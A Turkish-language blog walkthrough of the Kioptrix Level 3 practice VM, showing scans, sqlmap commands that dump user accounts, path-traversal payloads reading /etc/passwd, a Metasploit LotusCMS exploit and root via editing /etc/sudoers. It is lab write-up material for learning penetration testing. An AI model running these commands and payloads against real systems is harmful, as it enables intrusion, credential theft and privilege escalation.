Sızma Testi Örnekleri:Kioptrix Level 3

Kioptrix level 2 den birazcık daha zor ama oldukça zevkli ve düşündürücü oldu benim için. Birkaç yeni bilgi edindim bu makine sayesinde. Sizlerinde öğreneceğinizi tahmin ediyorum. Lafı uzatmadan başlayalım.

Sızma Testi Örnekleri:Kioptrix level 1
Sızma Testi Örnekleri:Kioptrix Level 2

Kioptrix Level 3 indirme bağlantısı : https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

İlk olarak netdiscover ile hedef makinenin ip adresini bulalım.

netdisover -r 192.168.0.0/16

Nmap ile makineyi detaylı tarama yaptığımızda aslında bilmemiz gereken çoğu şeyi gösteriyor bize

nmap -sS -p- 192.168.42.55 -n –script=vuln

Kioptrix Level 3 WEB

Webden ilerlemeden önce kioptrix makinesinin giriş ekranındaki bilgiyi ciddiye almakta fayda var.

etc dizini altında bulunan hosts dosyasına gereken ayarı yapalım.

nano /etc/hosts

Şimdi web üzerinden ilerleyebiliriz.Bizi şöyle bir web sayfası karşılıyor.

Giriş sayfasındaki yazının en altında bulunan “now” bağlantısına tıklıyorum ve eğlenceli bir sayfa çıkıyor karşımıza.

Size eğlenceli ve masum gelebilir ama sayfanın sol altında bulunan butonda sıralamayla oynadıktan sonra URL kısmında tehlikeyi hissedebilirsiniz 🙂

id kısmına ufak bir tırnak herşeyi mahvedebilir.

Şimdi sqlmap ile kolay bir şekilde kritik bilgilere ulaşabiliriz.

sqlmap -u “kioptrix3.com/gallery/gallery.php?id=1&sort” –dbs

gallery veritabanına girelim ve tablolara göz atalım.

sqlmap -u “kioptrix3.com/gallery/gallery.php?id=1&sort” -D gallery –tables

Kullanıcı bilgilerinin burda olduğu aşikar.Dump edelim

sqlmap -u “kioptrix3.com/gallery/gallery.php?id=1&sort” -D gallery -T dev_accounts –dump

İhtiyacımız olan tam da buydu.Şimdi ssh ile devam edelim bakalım bilgiler işe yarayacakmı.

ssh loneferret@kioptrix3.com

Bulunduğum dizinde “CompanyPolicy.README” isimli bir dosya var.İçinde ht editörü sudo ile açmamı istediği yazıyordu. “sudo -l” komutu ile baktığımda şifresiz olarak ht editörü açabileceğimi gördüm.Bu bizim için çok iyi bir haber.

Tabi ht editörü açmam için environment değerini değiştirmem gerekecek.

echo $TERM
export TERM=xterm-color
sudo ht

ht editörü ile etc dizini altında bulunan sudoers dosyasını açıp ufak bir değişiklik ile root olabiliriz.Ht editörde dosya açmak için F3 tuşuna basın ve dosya yolunu girin.

loneferret kullanıcısına şifresiz çalıştırabileceği yeni path olarak /bin/sh girersek root olabiliriz.(virgül koymayı unutmayın ) F2 ile kaydedip çıkalım.

sudo -l komutu ile tekrar kontrol ettiğimde şifresiz olarak çalıştırabileceğimi görüyorum.Ve sonuç ..

/root dizini altında bulunan Congrats.txt dosyasını okuyup bitirebiliz. Ama daha da ilerleyebiliriz bence.

Web sayfasında gezinirken url kısmına gözüm çarptı ve lfi olabileceğinden şüphelendim.Haklıydımda./etc/passwd dosyasını okuyabildim.

Ilgili zafiyet:

http://vulnerable_host/preview.php?file=../../../../etc/passwd%00

http://vulnerable_host/preview.php?file=../../../../etc/passwd%00jpg

Aynı zamanda anasayfada menüde bir de login vardı.Girdiğimde karşıma şöyle bir login ekranı çıktı ve bilin bakalım aşağı ne yazıyordu ?

Sızma testi örnekleri serisinin ilk yazısında lotuscms in nasıl sömürüleceğinden bahsetmiştim.Aynen devam.

use exploit/multi/http/lcms_php_exec
set RHOSTS kioptrix3.com
set URI /
exploit

İnteraktif shell e geçmek için ;

shell
python -c “import pyt;pty.spawn(‘/bin/bash’)”

Son olarak nikto ile tarama yaptığımda ve tabi nmap sonucunda da çıktığı üzere phpmyadmin vardı.

makinede /www/kioptrix3.com/gallery dizini altında bulunan gconfig.php yi açtığımda phpmyadmin giriş bilgilerini elde ettim.

Phpmyadmin e girip bilgileri kullandığımda başarılı oldum.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir